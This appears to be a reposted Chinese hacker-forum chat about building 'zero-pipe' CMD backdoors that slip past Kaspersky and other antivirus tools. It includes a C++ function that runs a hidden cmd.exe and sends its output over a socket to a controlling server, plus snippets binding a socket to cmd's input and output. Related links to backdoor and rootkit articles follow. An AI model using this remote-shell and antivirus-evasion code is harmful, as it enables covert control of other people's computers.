技术讨论关于零管道CMD后门

转载 2007年10月14日 13:27:00
冷风
草草细说下零管道 关注........

.μρ2ц清风
这个不光过卡巴了,,,基本上所有主动防御都过!!
包口SSM,微点,,,

夕草
hot patching

.μρ2ц清风
对啊..

冷风
用socket直接替换输入输出的handle,可以实现零管道


sulwan
颠覆核心编程啊

.μρ2ц清风
反正我是用零管道的..

幻影
    si.hStdInput=hrp1;
    si.hStdOutput=hwp2;

幻影
是格handle

.μρ2ц清风
呵呵,,有一点点小资料,,不过看不明白!!

幻影
而socket是整形吧?

夕草
黑防有文章介绍过

夕草
socket 是 unsigned long

幻影
对啊
你的意思是
    si.hStdInput=sock1;
    si.hStdOutput=sock1;

sulwan
整形

Lenk
做管道通讯?

sulwan
没错

sulwan
SOCKET socket(
  int af,      
  int type,    
  int protocol 
);
问下,可以理解这样吗

冷风
呵呵明白了....

.μρ2ц清风

int CCmdLine::DOSShell(char *command)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    HANDLE hRead=NULL,hWrite=NULL;

    TCHAR Cmdline[300]={0};     //命令行缓冲
    BYTE SendBuf[2048]={0};    //发送缓冲
    SECURITY_ATTRIBUTES sa;     //安全描述符
    DWORD bytesRead=0;
    std::string strBuffer;

    sa.nLength=sizeof(SECURITY_ATTRIBUTES);
    sa.lpSecurityDescriptor=NULL;
    sa.bInheritHandle=TRUE;

    //创建匿名管道
    if (!CreatePipe(&hRead,&hWrite,&sa,0)) 
        goto Clean;//失败

    si.cb=sizeof(STARTUPINFO);
    GetStartupInfo(&si);
    si.hStdError=hWrite;
    si.hStdOutput=hWrite;    //进程(cmd)的输出写入管道
    si.wShowWindow=SW_HIDE;
    si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

    GetSystemDirectory(Cmdline,sizeof (Cmdline));   //获取系统目录
    strcat(Cmdline,"//cmd.exe /c ");                //拼接cmd
    strcat(Cmdline,command);  //拼接一条完整的cmd命令
    //创建进程,也就是执行cmd命令
    if (!CreateProcess(NULL,Cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
        goto Clean;//失败
    CloseHandle(hWrite);

    while (TRUE)
    {
        //无限循环读取管道中的数据,直到管道中没有数据为止
        if (ReadFile(hRead,SendBuf,sizeof (SendBuf),&bytesRead,NULL)==0)
            break;
        m_hServer->Send(SendBuf,bytesRead);
        memset(SendBuf,0,sizeof (SendBuf));  //缓冲清零
        Sleep(100);                          //休息一下
    }
Clean:
    if (hRead!=NULL)
        CloseHandle(hRead);
   
    if (hWrite!=NULL)
        CloseHandle(hWrite);

    return true;
}
幻影
这代码什么意思?

幻影
零管道?

.μρ2ц清风
零管道!!

夕草
就是把socket强制转换为handle类型

幻影
不是吧,这样能过卡吧了?

.μρ2ц清风
夕草在说什么呢??

夕草
不是过咔吧,我只是说零管道

.μρ2ц清风
呵呵,你自己测试过不过卡巴咯..

夕草
过卡巴,可以拷贝cmd.exe为abc.exe啊


幻影
(hWrite); 根本没有用啊啊


sulwan
你这样做内存消耗大吗

夕草
StartupInfo.hStdInput = (HANDLE)sclient;

幻影
可以拷贝cmd.exe为abc.exe啊--貌似没用,我这样用还是提示

.μρ2ц清风

零管道,不是我理解错了把..
只是创建一个pipe,卡巴之监控创建两个pipe的代码,,
不关socket的事!!!你拷贝CMD为其他名字一样监控..

夕草
零管道就是不用创建管道

Lenk
晚点再来。朋友们,慢慢讨论

.μρ2ц清风
他的流程是之创建CMD,然后执行命令,把管道里的数据读出来,,,关闭管道!!发送读到的数据!

.μρ2ц清风
晕,是不是我理解错了..零管道还有其他的说法??

sulwan
汗!我看我的思维是不行了!长见识了

夕草
零管道就是不用CreatePipe了
直接用socket接管输入输出句柄

.μρ2ц清风
好了,我回头再看看资料..也不用争论了,能过卡巴就是好马..哈哈!!
BlackFeather
赶紧学习···



结帖了 呵呵 零管道理解成幻影的可以吧
si.hStdInput=sock1;
si.hStdOutput=sock1 

MFC 匿名管道实现输出

管道技术(Pipe),是一种具有两个端点的通信通道:有一端句柄的进程可以和有另一端句柄的进程通信。 管道可以是单向的:一端是只读的,另一端点是只写的; 也可以是双向的:管道的两端点既可读也可写。 ...
  • qq61394323
  • qq61394323
  • 2014年09月13日 17:09
  • 2139

cmd 组合命令和管道命令的使用

1.& Usage:第一条命令 & 第二条命令 [& 第三条命令...]  用这种方法可以同时执行多条命令,而不管命令是否执行成功 2.&&  Usage:第一条命令 && 第二条命令 [&&...
  • ncafei
  • ncafei
  • 2016年11月27日 19:57
  • 2496

双管道与cmd.exe进程间通信演示

看《老狼Gh0st远程协助软件编写系列教程(上半部)》视频的时候,4.1节有讲到双管道与cmd.exe进程间通信。所写的demo工程只能一次输入一个命令,然后返回。再次输入的时候会出现问题。在这里,我...
  • bnxf00000
  • bnxf00000
  • 2017年06月02日 10:51
  • 354

一个Shift的后门程序,可以让你可以进入你不知道密码的电脑

1.前提 你可以在平时亲身接触状态电脑,哪怕是在电脑主人不在的时候(虽然主人不在,或者关机了,进入电脑是要密码的)。 2.原理 利用电脑连续按5次Shift会触发粘滞键,它会运行c:\winows\s...
  • yakson
  • yakson
  • 2013年08月01日 09:41
  • 18259

VC调用cmd进行交互(双管道)

void CLikeCmdDlg::OnBtnExe() { // TODO: Add your control notification handler code here Upd...
  • jiangxt211
  • jiangxt211
  • 2016年03月03日 22:46
  • 1232

利用匿名管道实现远程调用CMD

源贴地址:http://www.cnblogs.com/thankgoodness/articles/1762596.html在一个进程里用双管道来回显,代码如下:#include "windows....
  • tianxiayijia1998
  • tianxiayijia1998
  • 2015年11月22日 22:02
  • 1311

匿名管道实现基于Socket的简单cmd后门

原文地址http://hi.baidu.com/yonder88/item/06c6c5c27569810dc610b26f Back.H #ifndef BACKDOOR_H_ #defi...
  • zy_dreamer
  • zy_dreamer
  • 2013年05月24日 19:55
  • 527

MFC 执行CMD命令 利用管道技术读取输出内容

MFC执行CMD命令并获得其返回信息源代码 MFC执行CMD命令并获得其返回值。 原理是利用管道技术,创建一个进程执行cmd命令,并将其返回信息存入管道中,再读出管道中的命令即可。 以下是我封装的一个...
  • qq61394323
  • qq61394323
  • 2014年10月06日 16:50
  • 2401

Kafka相关技术文档

目录索引: Kafka使用场景 1.为何使用消息系统 2.我们为何需要搭建Apache Kafka分布式系统 3.消息队列中点对点与发布订阅区别 Kafka设计与原理分析 1)a...
  • u014091123
  • u014091123
  • 2017年06月28日 14:38
  • 302

后门技术及rootkit工具-Knark分析及防范

要:本文讨论了Linux环境下攻击者入侵成功以后常常使用的一些后门技术,并且对最著名的rootkit工具之一—knark进行了详细的分析,并且指出了在发现系统被入侵以后如何发现是否是kark及如何恢复...
  • chinajust
  • chinajust
  • 2016年04月20日 14:57
  • 1409
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:技术讨论关于零管道CMD后门
举报原因:
原因补充:

(最多只允许输入30个字)